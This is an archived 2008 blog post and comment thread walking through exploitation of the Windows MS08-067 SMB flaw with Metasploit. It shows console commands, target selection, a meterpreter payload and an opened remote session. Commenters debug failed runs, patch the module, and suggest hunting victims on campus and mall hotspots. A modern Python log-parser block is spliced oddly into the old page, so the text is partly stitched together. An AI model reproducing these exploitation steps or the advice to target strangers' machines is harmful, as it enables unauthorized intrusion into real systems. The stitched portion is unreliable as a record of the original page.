Posted by kecoak on Oct 31, 2008

MS08-067

msf > version
Framework: 3.2-testing.5773
Console  : 3.2-testing.5773

msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show options

Module options:

Name     Current Setting  Required  Description
----     ---------------  --------  -----------
RHOST                     yes       The target address
RPORT    445              yes       Set the SMB service port
SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

msf exploit(ms08_067_netapi) > info windows/smb/ms08_067_netapi

Name: Microsoft Server Service Relative Path Stack Corruption
Version: 5803
Platform: Windows
Privileged: Yes
License: Metasploit Framework License (BSD)

Provided by:
hdm 

Available targets:
Id  Name
--  ----
0   Windows XP SP2 English (DEP)
1   Windows XP SP3 English (DEP)
2   Windows 2003 SP0 English (NO DEP)
3   Windows 2003 SP2 English (NO DEP)

Basic options:
Name     Current Setting  Required  Description
----     ---------------  --------  -----------
RHOST                     yes       The target address
RPORT    445              yes       Set the SMB service port
SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)

Payload information:
Space: 400
Avoid: 7 characters

Description:
This module exploits a parsing flaw in the path canonicalization
code of NetAPI32.dll through the Server Service. This module is
capable of bypassing DEP on some operating systems and service
packs. The correct target must be used to prevent the Server Service
(along with a dozen others in the same process) from crashing.
Windows XP targets seem to handle multiple successful exploitation
events, but 2003 targets will often crash or hang on subsequent
attempts. This is just the first version of this module, full
support for DEP bypass on 2003, along with other platforms, is still
in development.

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=2008-4250
http://www.microsoft.com/technet/security/bulletin/MS08-067.mspx

msf exploit(ms08_067_netapi) > set RHOST 192.168.132.130
RHOST => 192.168.132.130

msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp

msf exploit(ms08_067_netapi) > set TARGET 0
TARGET => 0
msf exploit(ms08_067_netapi) > exploit
[*] Started bind handler
[*] Connecting to the target...
[*] Binding to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.132.130[BROWSER] ...
[*] Bound to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.132.130[BROWSER] ...
[*] Triggering the vulnerability...
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (73227 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (192.168.132.1:51707 -> 192.168.132.130:4444)

meterpreter > sysinfo
Computer: Research-1
OS      : Windows XP (Build 2600, Service Pack 2).

Once again NetBIOS is the entry point into Microsoft Windows. Perhaps it is time for tutorial writers to drop the RPC DCOM holes as the standard example for breaking into Microsoft Windows via Metasploit.

I think everyone loves 2008…
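The console output in the post above (and the failed runs quoted in the comments further down) share one `[*]`/`[-]` status-line format. The parser below is an added example, not code from the post or from the Metasploit project: it classifies a captured run as a session opened, a session opened and then closed, an exploit failure, or a run that completed without a session, and it pulls out the selected target, the DCERPC bind host and pipe, and the session endpoints, which is the information an incident responder wants when reviewing recovered tool output. The transcripts it runs on are constructed from lines on this page; the `3.0@ncacn_np` interface string in the bind line is the SRVSVC interface version as msfconsole prints it and is an assumption, since the page shows that part garbled.

```python
"""Classify a captured msfconsole exploit run from its [*]/[-] status lines."""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Status-line patterns as printed by msfconsole in the transcripts on this page.
TARGET_RE = re.compile(r"^\[\*\] Selected Target: (?P<target>.+)$")
BIND_RE = re.compile(
    r"^\[\*\] Bound to (?P<uuid>[0-9a-f-]{36}):[^@]+@ncacn_np:"
    r"(?P<host>[\d.]+)\[\\?(?P<pipe>\w+)\]"
)
OPENED_RE = re.compile(
    r"^\[\*\] (?:Meterpreter|Command shell) session (?P<id>\d+) opened "
    r"\((?P<src>[\d.]+:\d+) -> (?P<dst>[\d.]+:\d+)\)"
)
CLOSED_RE = re.compile(r"^\[\*\] (?:Meterpreter|Command shell) session (?P<id>\d+) closed")
FAILED_RE = re.compile(r"^\[-\] Exploit failed: (?P<reason>.+)$")
NO_SESSION = "[*] Exploit completed, but no session was created."


@dataclass
class RunResult:
    outcome: str                       # session | session_closed | failed | no_session | unknown
    target: Optional[str] = None       # auto-detected or manually set exploit target
    bind_host: Optional[str] = None    # host the DCERPC bind went to (the RHOST)
    pipe: Optional[str] = None         # named pipe used for the bind (BROWSER or SRVSVC)
    session_id: Optional[int] = None
    endpoints: Optional[Tuple[str, str]] = None  # (handler side, target side)
    reason: Optional[str] = None       # text after "Exploit failed:"


def split_status_lines(text: str) -> List[str]:
    """One status entry per element, even when several '[*] ...' entries were
    pasted onto a single physical line (as in some of the comments)."""
    parts = re.split(r"(?=\[[*+!-]\] )", text)
    return [p.strip() for p in parts if p.strip()]


def parse_run(text: str) -> RunResult:
    result = RunResult(outcome="unknown")
    lines = split_status_lines(text)
    opened, closed = set(), set()
    for line in lines:
        if m := TARGET_RE.match(line):
            result.target = m.group("target")
        elif m := BIND_RE.match(line):
            result.bind_host, result.pipe = m.group("host"), m.group("pipe")
        elif m := OPENED_RE.match(line):
            sid = int(m.group("id"))
            opened.add(sid)
            result.session_id = sid
            result.endpoints = (m.group("src"), m.group("dst"))
        elif m := CLOSED_RE.match(line):
            closed.add(int(m.group("id")))
        elif m := FAILED_RE.match(line):
            result.reason = m.group("reason")
    # Decide the outcome: an explicit failure wins, then session state, then the
    # "completed, but no session" line that the failed runs in the thread show.
    if result.reason is not None:
        result.outcome = "failed"
    elif opened and opened <= closed:
        result.outcome = "session_closed"
    elif opened:
        result.outcome = "session"
    elif NO_SESSION in lines:
        result.outcome = "no_session"
    return result


# Constructed transcripts, assembled from the output quoted on this page.
SUCCESS_RUN = """\
[*] Started bind handler
[*] Connecting to the target...
[*] Bound to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:192.168.132.130[BROWSER] ...
[*] Triggering the vulnerability...
[*] Meterpreter session 1 opened (192.168.132.1:51707 -> 192.168.132.130:4444)
"""
FAILED_RUN = """\
[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[-] Exploit failed: can't convert nil into Integer
[*] Exploit completed, but no session was created.
"""
NO_SESSION_RUN = """\
[*] Started bind handler
[*] Fingerprint: Windows XP Service Pack 2 - lang:English [*] Selected Target: Windows XP SP2 English (NX) [*] Triggering the vulnerability...
[*] Exploit completed, but no session was created.
"""
CLOSED_RUN = """\
[*] Started bind handler
[*] Selected Target: Windows XP SP3 English (NX)
[*] Command shell session 2 opened (192.168.0.6:1661 -> 192.168.0.1:4545)
[*] Command shell session 2 closed.
"""

if __name__ == "__main__":
    for name, run in [("success", SUCCESS_RUN), ("failed", FAILED_RUN),
                      ("no_session", NO_SESSION_RUN), ("closed", CLOSED_RUN)]:
        print(name, parse_run(run))
```

The split on `[*]`/`[-]` markers rather than on newlines is what lets the parser cope with the run-together lines pasted in comments 36 and 37; the outcome order (failure, then closed, then open, then "no session") matches how the same run can print both a failure line and the "no session" line.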


40 Responses to “MS08-067”

  1. poniman_coy says:

    Wow, thanks bro. By the way, how come the 3.2 framework version for Windows hasn't been released yet?

  2. staff says:

    Metasploit 3.2 is still in testing; to get that version you can update directly from its trunk via svn.

  3. gentoo says:

    AFAIK, isn't target 0 the Windows 2000 option? If so, does that mean the ret addr is possibly the same (and I don't think so)? So weird 🙂. By the way, the exploit written by EMM works. Anyway, it seems MSF development is getting more and more bogged down :).. hehe

  4. staff says:

    #3 It depends on the version; if you update from the latest svn there is already a lot more target data for various locales, contributed by the worldwide MSF community. The write-up above used an early release. The RET ADDR is different, of course. Hehe, yes, since spoonm and skape are no longer core developers it seems there will be changes 🙂

    msf > version
    Framework: 3.2-testing.5773
    Console : 3.2-testing.5773
    msf exploit(ms08_067_netapi) > show targets

    Exploit targets:

    Id  Name
    --  ----
    0 Windows 2000 English
    1 Windows XP SP0 English (NO NX)
    2 Windows XP SP1 English (NO NX)
    3 Windows XP SP2 English (NX)
    4 Windows XP SP2 French (NX)
    5 Windows XP SP2 Italian (NX)
    6 Windows XP SP2 Portuguese (Brazil) (NX)
    7 Windows XP SP2 German (NX)
    8 Windows XP SP2 Chinese (NX)
    9 Windows XP SP3 French (NX)
    10 Windows XP SP3 English (NX)
    11 Windows XP SP3 Spanish (NX)
    12 Windows XP SP3 German (NX)
    13 Windows XP SP3 Portuguese (Brazil) (NX)
    14 Windows 2003 SP0 English (NO NX)
    15 Windows 2003 SP1 English (NO NX)
    16 Windows 2003 SP2 English (NO NX)
    17 Windows 2003 SP1 English (NX)
    18 Windows 2003 SP2 English (NX)

  5. gentoo says:

    Hahaha, yes, sorry, I didn't see that you had already listed it in the article (hmm, not paying enough attention). I haven't used MSF in a long time; I'm still conventional, stuck on single exploits (they're released faster, especially when they come from IRC :lol:)

    Yes, and on top of that there's the licensing change issue; besides, it seems there really was some political issue about the repeated delays in releasing this exploit. Microsoft was scared, apparently.

  6. franky says:

    Bro, I updated Metasploit on Thursday, 6 Nov 2008 (command = "svn update"), but it doesn't work…
    The error looks like this:
    msf exploit(ms08_067_netapi) > exploit
    [*] Started bind handler
    [*] Automatically detecting the target...
    [*] Fingerprint: Windows XP Service Pack 2 - lang:English
    [*] Selected Target: Windows XP SP2 English (NX)
    [-] Exploit failed: can't convert nil into Integer
    [*] Exploit completed, but no session was created.
    msf exploit(ms08_067_netapi) >
    Yet when I updated on Wednesday, 5 Nov 2008, the exploit ran, and on the same computer (my own LAN). Why is that, bro?
    Or could I ask for your "ms08_067_netapi.rb" file? Please send it to my e-mail, bro…
    Thank you…

  7. CorbinZ says:

    @poniman_coy
    If you want to use the 3.2-testing version on WINDOWS you have to update via svn update. The way to do it: "svn co http://metasploit.com/svn/framework3/trunk"

    @franky
    "Exploit failed: can't convert nil into Integer". According to the owner, HD Moore, when I contacted him, he said that this indeed happens for certain SPs.. but, hold on.. try looking at the script in Notepad.
    Find the word "Sratch" and replace it with "Scratch". In my opinion that patch, revision 5846, is broken. Just wait for the next patch; maybe the typo will have been fixed.

    To all: I'm new here, I need to learn a lot from you all, especially writing exploit code.

    Thanks

    -Corbinz-

  8. staff says:

    #6, as CorbinZ said, there is a typo in the Scratch address part of every target. In that update it is written Sratch instead of Scratch; I tried updating from the same trunk as you and got the same error. Just replace Sratch with Scratch.

    $ sed -i 's/Sratch/Scratch/g' ms08_067_netapi.rb

    #7, Welcome… =)

  9. Ph03n1X says:

    Whoa, the young people these days just keep getting cooler..
    **I've never even used Metasploit and can't 🙁

  10. scut says:

    ** Ugh, I've never been able to use Metasploit… Just my luck **

  11. franky says:

    @corbinZ and @staff
    The exploit is working again, thanks a lot bro….
    @ph03n1x and @scut
    Just keep trying, don't give up, and if there's an error it can be discussed here….

  12. Ph03n1X says:

    #10
    That's why, dude, don't wait for a handout! Find it yourself =))
    #11
    Reaaaaady, boss 🙂

  13. QU1NT1N says:

    I have installed BT3F and updated its msf3. What would the next steps be after using "PAYLOAD windows/meterpreter/bind_tcp"? Sorry, I just want to know. I have no place to try it out. Thanks to whoever is willing to answer.

  14. franky says:

    @QU1NT1N
    Just type "help"; it lists which features are available in meterpreter….
    Happy trying..

  15. poniman_coy says:

    @CorbinZ thanks bro, it works,

  16. QU1NT1N says:

    Is that so, bro franky? Okay then, I'll borrow a pirated CD first…

  17. poniman_coy says:

    Hmm, why is it, bro: when I run svn co http://metasploit.com/svn/framework3/trunk it runs, and when it finishes it says checked out revision 5846. Now, your suggestion above was to replace the word Sratch with Scratch. When I checked, the word sratch was no longer there, only Scratch, so it should already be correct. But then when I use windows/smb/ms08_067_netapi it fails. Is there still something wrong? Is it because I'm using Metasploit 3.0? Do I have to use 3.1?

  18. scut says:

    #12 I'm going to Bandung on 15 November; if you want to come along, try confirming with Opik.

  19. CorbinZ says:

    @poniman_coy
    YUP… just use 3.1, it's more up to date…

  20. staff says:

    #20, take a look at the girls in Bandung for me, it's been a long time since I visited =))

  21. poniman_coy says:

    @CorbinZ I'll try it, bro…

    @http://video.google.com/videoplay?docid=-5555664098592837592 , you could go blind watching that video… the picture is all broken up..

  22. QU1NT1N says:

    Asking permission to download the video.

  23. asmssl says:

    I'm using Metasploit version 3.1 for Windows. It has been updated using the Online Update file, but the exploit for MS08-067 still isn't there… I already have ms08_067_netapi.rb, so how do I integrate it into the Metasploit Framework???

    Thanks

  24. zodiac says:

    Bro, how do you configure svn when using an HTTP proxy? I keep failing when I try.

  25. f4r1z says:

    How come after "svn co http://metasploit.com/svn/framework3/trunk" I still get
    msf > version
    Framework: 3.1-release.5366
    Console : 3.1-release.5404
    and when I run "svn update" the output is
    Skipped '.'
    please, I'd like a solution

  26. b4tn3t says:

    Hmm, still confused hehehehe.. there's really no place to explore it..

  27. franky says:

    @f4riz
    Just download version 3.2, it has been released…
    @b4tn3t
    As for targets, you can look for them at campuses and malls that provide hotspots…

    Does anyone know of or have a video on defacing the desktop display??
    thanks all…

  28. f4r1z says:

    @franky
    Yes, I've downloaded it and it worked. Thanks to all the kecoak folks, I learned something new.

  29. iroel says:

    That's cool; what remains is how to defend it. Does anyone know? Let's not end up attacking and then getting attacked and completely beaten ourselves :))

    Btw, does anyone know how to install additional modules/exploits in Metasploit?

  30. asik2 says:

    ^-- just run Start -> Programs -> Metasploit 3 -> Online Update,,
    it will download it by itself ^_^

    Wow, excellent, it can be used against XP SP2,

    btw, how can we open port 445 on the target computer so that this exploit can be delivered? Does anyone know? plz . . .

  31. CyberTank says:

    #31
    Defend? Just update Windows :p

    #32
    Open the port? Uninstall the update :p

  32. youthanesia says:

    Opening a port is probably hard; better to scan for port 445. But that takes a long time, you know…

  33. az says:

    msf exploit(ms08_067_netapi) > exploit

    [*] Started bind handler
    [*] Automatically detecting the target...
    [*] Fingerprint: Windows XP Service Pack 2 - lang:English
    [*] Selected Target: Windows XP SP2 English (NX)
    [*] Triggering the vulnerability...
    [*] Exploit completed, but no session was created.

    # Why doesn't it work?? Any ideas, guys?

  34. grind says:

    Yes, I have the same problem as #35

    .....
    [*] Triggering the vulnerability...
    [*] Exploit completed, but no session was created.

    Why is that, bro?

  35. NewBie says:

    Same here… it never succeeds.
    It ALWAYS fails… phew

  36. cemens says:

    A hot afternoon:

    I tried following this but it always shows:

    >> exploit
    [*] Started bind handler
    [*] Automatically detecting the target...
    [*] Fingerprint: Windows XP Service Pack 2 - lang:English
    [*] Selected Target: Windows XP SP2 English (NX)
    [*] Triggering the vulnerability...
    [*] Exploit completed, but no session was created.

    thanks for the info

  37. iroel says:

    The portable version of Metasploit 3.2 can be downloaded at http://www.indowebster.com/Metasploit_Framework_32_Portable.html Please use it wisely.

    I tried the same thing as in the tutorial. The DOS prompt session doesn't appear. When using the payload windows/shell_bind_tcp, the session closes immediately when I try to open the target's DOS prompt. Does anyone know the cause? Here's the output:
    [*] Started bind handler
    [*] Automatically detecting the target...
    [*] Fingerprint: Windows XP Service Pack 3 - lang:English
    [*] Selected Target: Windows XP SP3 English (NX)
    [*] Triggering the vulnerability...
    [*] Command shell session 2 opened (192.168.0.6:1661 -> 192.168.0.1:4545)
    [*] Command shell session 2 closed.

  38. rooted.slash says:

    lol
    happy playing 🙂
    playing for happy
    wtf 😛
